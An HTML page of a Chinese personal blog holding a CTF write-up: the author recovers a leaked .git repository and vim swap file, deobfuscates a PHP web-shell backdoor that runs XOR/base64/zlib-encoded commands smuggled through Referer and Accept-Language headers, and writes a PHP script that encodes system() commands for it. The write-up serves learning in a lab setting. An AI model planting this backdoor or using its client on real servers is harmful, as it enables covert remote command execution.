<!DOCTYPE HTML>
<html class="no-js" lang="zh-CN">
<head><meta name="generator" content="Hexo 3.8.0">
    <!--[if lte IE 9]>
<meta http-equiv="refresh" content="0;url=http://yoursite.com/warn.html">
<![endif]-->
<meta charset="utf-8">
<meta http-equiv="X-DNS-Prefetch-Control" content="on">
<link rel="dns-prefetch" href="http://yoursite.com">
<link rel="dns-prefetch" href="//www.google-analytics.com">
<link rel="prefetch" href="http://yoursite.com">
<link rel="prefetch" href="//www.google-analytics.com">


<link rel="prerender" href="http://yoursite.com">

<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="renderer" content="webkit">
<meta name="viewport" content="width=device-width, initial-scale=1.0,user-scalable=no">
<meta http-equiv="mobile-agent" content="format=html5; url=http://yoursite.com">
<meta name="author" content="John Doe">
<link rel="stylesheet" href="/css/JSimple.css">

<link rel="shortcut icon" href="/images/favicon.png">


<title>backdoora - Hexo</title>

<meta name="keywords" content>

<meta name="description " content>

    <script type="text/x-mathjax-config">
        MathJax.Hub.Config({
            tex2jax: {
                inlineMath: [ ['$','$'], ["\\(","\\)"] ],
                processEscapes: true
            }
        });
    </script>


    

    

</head>
<body>
<div id="nav">
    <nav class="nav-menu">
        <a class="site-name current" href="/" title="说">说</a>
        <a class="site-index current" href="/"><i class="fa fa-home"></i><span>首页</span></a>
        <a href="/archives" title="归档"><i class="fa fa-archives"></i><span>归档</span></a>
        <a href="/tags" title="标签"><i class="fa fa-tags"></i><span>标签</span></a>
        <!-- custom single page of menus -->
        
        
        <a href="/help" title="帮助">
            <i class="fa fa-question-circle"></i>
            <span>帮助</span>
        </a>
        
    </nav>
</div>

<div class="nav-user">
    <a class="btn-search" href="#"><i class="fa fa-search"></i></a>
    <a class="btn-read-mode" href="#"><i class="fa fa-sun-o"></i></a>
    <a class="btn-sns-qr" href="javascript:"><i class="fa fa-telegram"></i></a>
</div>

<div id="wrapper" class="clearfix">
    <div id="body">
        <div class="main" id="main">
            <div id="cover">
    <div class="cover-img"></div>
    <div class="cover-info">
        
        <h1 class="cover-siteName">说IT</h1>
        <h3 class="cover-siteTitle">用代码摇滚这个世界</h3>
        <p class="cover-siteDesc">一个关注技术与人文的IT博客</p>
        <div class="cover-sns">
            
    &nbsp;&nbsp;<div class="btn btn-telegram">
        <a href="http://t.me/kunyintang" target="_blank" title="telegram" ref="friend">
            <i class="fa fa-telegram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-instagram">
        <a href="https://www.instagram.com/mtangsir/" target="_blank" title="instagram" ref="friend">
            <i class="fa fa-instagram"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-twitter">
        <a href="https://twitter.com/tangkunyin" target="_blank" title="twitter" ref="friend">
            <i class="fa fa-twitter"></i>
        </a>
    </div>

    &nbsp;&nbsp;<div class="btn btn-github">
        <a href="https://github.com/tangkunyin" target="_blank" title="github" ref="friend">
            <i class="fa fa-github"></i>
        </a>
    </div>


        </div>
    </div>
</div>

            <div class="page-title">
    <ul>
        <li><a href="/">最近</a></li>
        
        
        
        <li class="page-search">
    <form id="search" class="search-form">
        <input type="text" readonly="readonly" id="local-search-input-tip" placeholder="读物检索~">
        <button type="button" disabled="disabled" class="search-form-submit"><i class="fa fa-search"></i></button>
    </form>
</li>

    </ul>
</div>
<div class="main-inner">
    <article class="post" itemscope itemtype="http://schema.org/BlogPosting">
        <div class="post-header">
            <div class="post-author clearfix">
                <a class="avatar fleft" href="https://shuoit.net" target="_blank">
                    <img width="48" src="/images/favicon.png" alt="avatar">
                </a>
                <p><span class="label">作者</span>
                    <a href="https://shuoit.net" target="_blank">纠结伦</a>
                    <span title="最后编辑于&nbsp;2019-04-02">2019-04-02</span>
                </p>
                <p>一个搬🧱的劳斯基😁️️</p>
            </div>
            <h2 class="post-title">Backdoora</h2>
            <div class="post-meta">
                本文共计4643个字 |
                您是第&nbsp;<span id="busuanzi_value_page_pv"><i class="fa fa-spinner fa-spin"></i></span>位看到它们的小伙伴
            </div>
        </div>
        <div class="post-content markdown-body">
            <p>这道题周四做了一整天，研究了老半天，然后问了老大，在老大的持续帮助下，才勉强做了出来。。。。本来周四晚上就应该把博客整理出来，但是周四看到了好晚，因为清明假期定了去爬长城。。。就早早的睡了。。一拖再拖，这次必须把这篇文章总结完成，否则不久白做了。。。。。。。希望我可以在一个小时内完成吧。。。。。费劲哈</p>
<p>首先打开题目，看到flag.php<br><img src="/2019/04/02/Backdoora/Backdoora-944b4a96.png" alt><br>试着访问一下：<br><img src="/2019/04/02/Backdoora/Backdoora-dba95dec.png" alt><br>不是正确的flag。。。<br>联系题目文件泄露，尝试几个常用的经常泄露的备份文件，.swp .swo .bak。。<br><img src="/2019/04/02/Backdoora/Backdoora-bf5b78fa.png" alt><br>结果返回404，访问无效，最后发现.git文件泄露<br><img src="/2019/04/02/Backdoora/Backdoora-45938a00.png" alt><br>发现返回403,403的意思是请求被拒绝，这里就可以利用git泄露的脚本下载下来源文件。用到的工具为rip-git.pl这个脚本，下载地址：：<a href="https://github.com/kost/dvcs-ripper" target="_blank" rel="noopener">https://github.com/kost/dvcs-ripper</a><br>可以查看flag.php<br><img src="/2019/04/02/Backdoora/Backdoora-3659c308.png" alt><br>查看flag.php的每次修改记录：<br><img src="/2019/04/02/Backdoora/Backdoora-6288d102.png" alt><br>查看最近修改一次的内容：<br><img src="/2019/04/02/Backdoora/Backdoora-b2881677.png" alt><br>根据提示，访问b4ckdo0r.php，结果什么都没有。。。。。<br>再试一次文件泄露，尝试b4ckdo0r.php.swo和b4ckdo0r.php.swp文件，这两个都是vim在编辑过程中产生的缓存文件，果然找到了b4ckdo0r.php.swo。。。<br><img src="/2019/04/02/Backdoora/Backdoora-6490b279.png" alt><br>下载下来，用vim打开。。。打了半天没有打开。。。。先看着网上的代码，等着老大回消息吧。。。哭哭哭。。。<br><img src="/2019/04/02/Backdoora/Backdoora-c648d2b5.png" alt><br>打开后，就看到了这个，吓了我一大跳，这是个什么东西。。。。<br><img src="/2019/04/02/Backdoora/Backdoora-6d94fba4.png" alt><br>后来老大给了一个教程：<br><a href="http://www.cnblogs.com/go2bed/p/5920811.html" target="_blank" rel="noopener">http://www.cnblogs.com/go2bed/p/5920811.html</a><br>主要看$y和$L和$v这3个变量，分别对应的是<br>$y = create_function  //这里去掉了字符串中的字母b<br>$L = 把上面的如 $c, $f等字符串变量中的“)m“给去掉<br>$v = create_function(‘’, $L); 这里是生成一个不带参数的匿名函数，函数内容就是$L的内容。<br>然后运行$v()函数，根据这个逻辑解开混淆后$L的内容：<br><img src="/2019/04/02/Backdoora/Backdoora-7ccf5523.png" alt><br>整理一下：<br>&lt;?php<br>$kh=”4f7f”;<br>$kf=”28d7”;</p>
<p>// 循环异或加密解密，密钥 $k<br>function x($t,$k){<br>    $c=strlen($k);<br>    $l=strlen($t);<br>    $o=””;<br>    for($i=0;$i&lt;$l;){<br>        for($j=0;($j&lt;$c&amp;&amp;$i&lt;$l);$j++,$i++){<br>            $o.=$t{$i}^$k{$j};<br>        }<br>    }<br>    return $o;<br>}<br>$r=$_SERVER;<br>$rr=@$r[“HTTP_REFERER”];<br>$ra=@$r[“HTTP_ACCEPT_LANGUAGE”];<br>if($rr&amp;&amp;$ra){<br>    // 将 referer 的 query string 的 各个value取出到 $q<br>    $u=parse_url($rr); // parse referer, return array, keys: scheme,host,port,user,pass,path,query,fragment<br>    parse_str($u[“query”],$q); // parse query string into $q (array).<br>    $q=array_values($q);        // array values</p>
<pre><code>// 分析 Accept-Language， 提取 每种语言的首字母和权重数字。
// Searches $ra for all matches to the regular expression given and puts them in $m
preg_match_all(&quot;/([\w])[\w-]+(?:;q=0.([\d]))?,?/&quot;,$ra,$m);
if($q&amp;&amp;$m){
    @session_start();
    $s=&amp;$_SESSION;
    $ss=&quot;substr&quot;;
    $sl=&quot;strtolower&quot;;
    $i=$m[1][0].$m[1][1];              // 两组首字母
    $h=$sl($ss(md5($i.$kh),0,3)); // md5($i . $kh) 的前三个字符小写。攻击时附在 $p 开头
    $f=$sl($ss(md5($i.$kf),0,3)); // $p 是编码后Payload，攻击时附加到$p 后面

    // 拼接Payload
    $p=&quot;&quot;;
    for($z=1;$z&lt;count($m[1]);$z++)  // 从$q 中取出 $m 正则匹配到的第2组中索引 1 -- count($m[1])-1 的值(0-9)作为键的值连接，得到$p
        $p.=$q[$m[2][$z]];         // 上例（language）, $p .= $q[8]


    // 去除 $p Payload 开头的 $h
    if(strpos($p,$h)===0){        // $h 在 $p[0] 位置出现。
        $s[$i]=&quot;&quot;;        // $_SESSION[$i] = &apos;&apos;  , $i 是正则匹配到的两组首字母
        $p=$ss($p,3);    // $p 从第3个字符开始的子串,去掉 $h
    }
    if(array_key_exists($i,$s)){         // exist $s[$i], $_SESSION[$i] , if 条件必须有 上文 $h 在 $p[0] 位置出现
        $s[$i].=$p;
        $e=strpos($s[$i],$f);   // $f 是md5 前三个字符小写 ，在 $s[$i]
        if($e){    // 必须有 $f 作为&quot;停止字符串&quot;
            $k=$kh.$kf; // 4f7f28d7
            ob_start();
            /*
            去除末尾的 $f
            URL safe base64 还原为普通base64
            base64 解码
            循环异或解密
            zlib 解密，还原出PHP代码
            执行PHP代码
            */
            //@eval(@gzuncompress(@x(@base64_decode( preg_replace(array(&quot;/_/&quot;,&quot;/-/&quot;),array(&quot;/&quot;,&quot;+&quot;),$ss($s[$i],0,$e)) ),$k)));
            echo &quot;CMD WILL EXEC:\n&lt;br /&gt;&quot;;
            echo(@gzuncompress(@x(@base64_decode( preg_replace(array(&quot;/_/&quot;,&quot;/-/&quot;),array(&quot;/&quot;,&quot;+&quot;),$ss($s[$i],0,$e)) ),$k)));
            $o=ob_get_contents();  // output
            ob_end_clean();
            $d=base64_encode(x(gzcompress($o),$k));  // 编码
            print $o;
            //print(&quot;&lt;$k&gt;$d&lt;/$k&gt;&quot;);
            @session_destroy();
        }
    }
}
</code></pre><p>}<br>把老大给的某个大佬的解析复制一下，来源在上边。。。。。<br>我自己理解了很长时间。。先去吃个饭。。回来继续写，继续分析。。。。<br>分析开始，顺带自己再复习一遍。。。<br>关于正则表达式：<br><img src="/2019/04/02/Backdoora/Backdoora-51bd3826.png" alt><br>代码首先是交代了一个加密算法，$k为密钥，$t为明文，用密钥的每一位和明文进行加密，若密钥位数小于明文，则循环使用。接下来将 referer 的 query string 的 各个value取出到 $q。然后分析 Accept-Language，提取每种语言的首字母和权重数字。然后最重要的是它先去掉了前三位和后三位，然后替代，再base64解密，最后解压。<br>所以我们写payload脚本时反过来写。。。。<br>脚本：<br>&lt;?php</p>
<p>function x($t,$k) {<br>    $c=strlen($k);<br>    $l=strlen($t);<br>    $o=””;<br>    for($i=0; $i&lt;$l;) {<br>        for($j=0; ($j&lt;$c&amp;&amp;$i&lt;$l); $j++,$i++) {<br>            $o.= $t{$i} ^ $k{$j};<br>        }<br>    }<br>    return $o;<br>}</p>
<p>function get_answer($str){<br>    $str = base64_decode($str);<br>    $str = x($str, ‘4f7f28d7’);<br>    $str = gzuncompress($str);<br>    echo $str . “<br>“;<br>}</p>
<p>function input($cmd){<br>    $str = ‘system(“‘ . $cmd . ‘“);’;<br>    $t1 = gzcompress($str);<br>    echo ‘$t1 = ‘ . $t1 . “<br>“;<br>    $t2 = x($t1, ‘4f7f28d7’);<br>    echo ‘$t2 = ‘ . $t2 . “<br>“;<br>    $t3 = base64_encode($t2);<br>    echo ‘$t3 = ‘ . $t3 . “<br>“;<br>    return $t3;<br>}</p>
<p>$ra=’zh-CN,zh;q=0.0’;<br>input(‘ls’);<br>//get_answer(‘’);</p>
<p>?&gt;</p>
<p>结果为:<img src="/2019/04/02/Backdoora/Backdoora-47ffac58.png" alt><br>用bp抓包，然后更改：<br><img src="/2019/04/02/Backdoora/Backdoora-bdf5519b.png" alt><br>最后将右边的结果输入到脚本中：<br><img src="/2019/04/02/Backdoora/Backdoora-d3c2aaf7.png" alt><br>结果：<br><img src="/2019/04/02/Backdoora/Backdoora-14fb7cec.png" alt><br>接下来生成cat this_i5_flag.php的payload：<br><img src="/2019/04/02/Backdoora/Backdoora-216c4bed.png" alt><br>结果：<img src="/2019/04/02/Backdoora/Backdoora-9eceef91.png" alt><br>然后带入：<br><img src="/2019/04/02/Backdoora/Backdoora-165c1bb3.png" alt><br>查看源码，结果：<br><img src="/2019/04/02/Backdoora/Backdoora-8ce045b9.png" alt><br>终于结束。。。。。。谢天谢地。。。<br>不过有两个地方不是很明白，为什么第一个payload用‘ls’，还有8.8.8.8，好像是谷歌的一个东西。。。。菜鸟一枚。。</p>

        </div>
        <div class="post-tool">
            <a class="btn-thumbs-up" href="javascript:void(0);" data-cid="52" title="95">
                <i class="fa fa-thumbs-up" aria-hidden="true"></i> 打赏
            </a>
        </div>
        
        <div class="post-tags">标签：
            
            <a href="/tags/ctf/">ctf</a>
            
        </div>
        
    </article>
    
    <p style="text-align: center">本文代表个人观点，内容仅供参考。若有不恰当之处，望不吝赐教！</p>
    
    

    

</div>
<script src="/js/busuanzi.pure.mini.js"></script>


        </div><!-- end #main-->
    </div><!-- end #body -->
    <footer class="footer">
    <div class="footer-inner" style="text-align: center">
        <p>
            <a href="/about" title="关于">关于</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <!-- 自定义链接 -->
            <a href="/help" title="帮助">帮助</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/links" title="友链">友链</a>&nbsp;&nbsp<em>·</em>&nbsp;&nbsp
            <a href="/sitemap.xml" title="地图">地图</a>
        </p>
        <p>
            本站已建立&nbsp<a href="/timeline" id="siteBuildingTime"></a>&nbsp天，<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" target="_blank" rel="licence">采用知识共享署名-非商业性使用-相同方式共享 4.0 国际许可协议创作</a><br>
            ©2017-<span id="cpYear"></span> 基于&nbsp<a href="http://hexo.io" target="_blank" rel="nofollow">Hexo</a>
            ，主题采用&nbsp&nbsp<a href="https://github.com/tangkunyin/hexo-theme-jsimple" target="_blank" rel="bookmark">JSimple</a>
            ，作者&nbsp<a href="https://shuoit.net" target="_blank" rel="friend">纠结伦</a>
            ，Hosted by <a href="https://pages.github.com/" target="_blank" rel="nofollow">GitHub Pages</a>
        </p>
    </div>
</footer>
<script src="/js/SimpleCore.js"></script>

</div>
<!-- search pop -->
<div class="popup search-popup local-search-popup">
    <div class="local-search-header clearfix">
        <span class="search-icon">
            <i class="fa fa-search"></i>
        </span>
        <span class="popup-btn-close">
            <i class="fa fa-times-circle"></i>
        </span>
        <div class="local-search-input-wrapper">
            <input id="local-search-input" spellcheck="false" type="text" autocomplete="off" placeholder="请输入查询关键词">
        </div>
    </div>
    <div id="local-search-result"></div>
</div>
<div class="fixed-btn">
    <a class="btn-gotop" href="javascript:"> <i class="fa fa-angle-up"></i></a>
</div>
<script>
    $(function () {
        var jsi_config = {
            buildingTime: '01/20/2018',
            current: $('.post-tags').length > 0 ? 'post' : 'archive',
            snsQRCode: '/images/sns-qrcode.png',
            donateImg: '/images/donate-qr.png',
            localSearch: { dbPath: '' },
            readMode: 'day'
        };
        
        SimpleCore.init(jsi_config);
        
    });
</script>
</body>
</html>
